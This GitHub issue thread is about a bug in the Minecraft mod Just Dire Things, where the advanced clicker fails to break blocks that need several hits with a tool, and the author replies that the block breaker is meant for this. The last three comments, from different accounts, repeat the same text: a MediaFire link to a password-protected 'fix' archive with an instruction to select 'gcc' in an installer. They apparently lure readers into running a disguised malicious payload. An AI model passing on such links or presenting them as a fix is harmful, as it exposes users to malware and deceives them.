### ISSUE TITLE
Block clicker with 2+ click requirements does not work (ex: axe breaking wood)

### ISSUE THREAD

**Issue by tkuneck** [Direwolf20-MC/JustDireThings#135]
### Just Dire Things version

1.1.1

### Minecraft Version

1.21.1

### (Neo)Forge Version

21.1.28

### Do you have optifine or Rubidium installed?

Yes

### Describe the issue

Progressive progress on breaking blocks with tools in the clickers doesn't seem to work. Progress gets reset while draining power in advanced clicker.

### Steps to reproduce

I'm testing with the following:
1. advanced clicker with plenty of power.
2. celestigem axe with tree feller
3. target advanced clicker so it can break one block of a grown dark oak tree.

Watch block break animation appear on the block and power reduce, however breaking progress does not progress beyond initial break animation.

### Expected behaviour

break the tree ? :)

**Comment by Direwolf20-MC** [comment]
This is why the block breaker exists. You can put the tool in it and it will break blocks using the tool

**Comment by AMSNX** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Aadya1603** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by yiweifengyan** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."
